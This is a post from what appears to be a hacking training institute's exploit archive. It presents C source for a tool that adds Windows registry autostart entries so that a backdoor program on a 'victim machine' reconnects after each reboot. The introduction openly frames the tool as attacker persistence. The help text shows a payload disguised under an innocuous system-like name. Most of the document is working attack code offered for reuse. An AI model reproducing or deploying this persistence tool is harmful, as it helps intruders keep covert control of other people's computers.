| Filename | Adding your program to the autostart of a windows machine. |
| Permission | rw-r--r-- |
| Author | Unknown |
| Date and Time | 6/10/2013 |
| Label | Penetration |
| Action |
./Arizona Team
During my CEH class one of my student told me that he has created a program that will give him back connection of the victim machine when ever he clicks on that file. But the problem was that he will click the file just once, after rebooting the machine the IP would definitely change as many of the victims are kept on dynamic live ip address which change frequently. So to get rid of this problem we came to a conclusion, that we will write a program that will help us to fix our file in the autostart mode so that when ever the system reboots the file gets auto executed.
So logic flowed and we came up with a perfect program.
Go through logical flow of the program if you find any difficulty you can shoot your query at instructor@arizonainfotech.com. Go through the code and create a new program for yourself.
And to all stupid people who are misleading students by saying that programming knowledge is not needed for hacking, humble request stop manufacturing script kiddie in your institutes.
/*
Hacker PRO hona chahiye...
Expert toh Dish wash Bar bhi hai.
*/
Here is the code:
#include <stdio.h>
#include <windows.h>
#include <iostream.h>
#include <string.h>
int add_key(int keynum, char *keyname, char *keyvalue);
void show_keys(void);
void interactiv(void);
void passiv_mode(int keynum, char *keyname, char *keyvalue);
void help(char *progname);
void header(void);
char *Run[] = {
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce",
"HKEY_USERS\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunServices",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Explorer\\User Shell Folders",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\Run",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\Load",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Polices\\Microsoft\\Windows\\System\\Scripts\\Startup",
NULL };
int main(int argc, char **argv)
{
int i, num, passiv = -1;
for(i = 1; i < argc; i++) {
if(strncmp(argv[i], "-h", 2) == 0) help(argv[0]);
if(strncmp(argv[i], "-s", 2) == 0) { show_keys(); exit(0x00); }
if(strncmp(argv[i], "-p", 2) == 0) passiv = 0;
}
if(passiv == -1) interactiv(); /* go interactiv mode */
if(argc != 5) help(argv[0]);
passiv_mode(atoi(argv[2]), /* key number */
argv[3], /* key name */
argv[4]); /* key value */
return(0x00);
}
void interactiv(void)
{
int num;
char keyname[50] = {0x00};
char keyvalue[50] = {0x00};
char bla[2];
header();
printf("\tINTERACTIVE MODE\n\n");
show_keys();
printf("\n\t select your favorite keypath: \n"); fflush(stdout);
scanf("%d",&num); fflush(stdin);
printf("type in the keyname [0-50]: \n"); fflush(stdout);
scanf("%50[^\n]s",keyname); fflush(stdin);
printf("type in the keyvalue [0-50]: \n"); fflush(stdout);
scanf("%50[^\n]s",keyvalue); fflush(stdin);
printf("add key path %s with name %s and value %s\n",Run[--num], keyname, keyvalue);
printf("hit enter to add key (STRG+C to quit)\n");
getchar();
printf("keyadd=%s\n",
((add_key(num, keyname, keyvalue)==0) ? "done" : "faild"));
exit(0x00);
}
void passiv_mode(int keynum, char *keyname, char *keyvalue)
{
add_key(--keynum, keyname, keyvalue);
exit(0x00);
}
void show_keys(void)
{
int i;
for(i = 0; Run[i] != NULL; printf("%d.\t%s\n",i,Run[i++]));
}
int add_key(int keynumber, char *keyname, char *keyvalue)
{
int retval;
HKEY hkey, constant;
if(strstr(Run[keynumber], "HKEY_CURRENT_USER") != NULL)
constant = HKEY_CURRENT_USER;
else if(strstr(Run[keynumber], "HKEY_USERS") != NULL)
constant = HKEY_USERS;
else if(strstr(Run[keynumber], "HKEY_LOCAL_MACHINE") != NULL)
constant = HKEY_LOCAL_MACHINE;
retval = RegCreateKeyEx(constant, (char *)memchr(Run[keynumber], '\\' ,strlen(Run[keynumber])),0,0,REG_OPTION_NON_VOLATILE,
KEY_ALL_ACCESS, NULL, &hkey, 0);
retval |= RegSetValueEx(hkey, keyname, 0, REG_SZ, keyvalue, strlen(keyvalue));
return(retval);
}
void help(char *progname)
{
printf("addkey\n");
printf("addkey [options]\n");
printf("options\n");
printf("-------\n");
printf("-h: prints out help\n");
printf("-s: shows all possible autostart regkeys\n");
printf("-p: switch to passiv mode\n");
printf("if you use the passiv mode the next argument after \"-p\" must\n");
printf("be the keynumber. use the \"s\" swtich to see all keys and numbers\n");
printf("next argument must be the keyname you want to add and then the value\n");
printf("e.g.: addkey -p 1 sysmgr32 \"C:\\WINNT\\remote_admin.exe\"\n\n");
printf("have fun!\n");
exit(0x00);
}
void header(void)
{
printf("www.arizonainfotech.com\n");
printf(" - - - - \n");
printf(" keyadd \n");
printf(" - - - \n");
}
www.arizonainfotech.com
CEH CHFI ECSA ENSA CCNA CCNA SECURITY MCITP RHCE CLOUD ANDROID IPHONE NETWORKING HARDWARE TRAINING INSTITUTE IN PUNE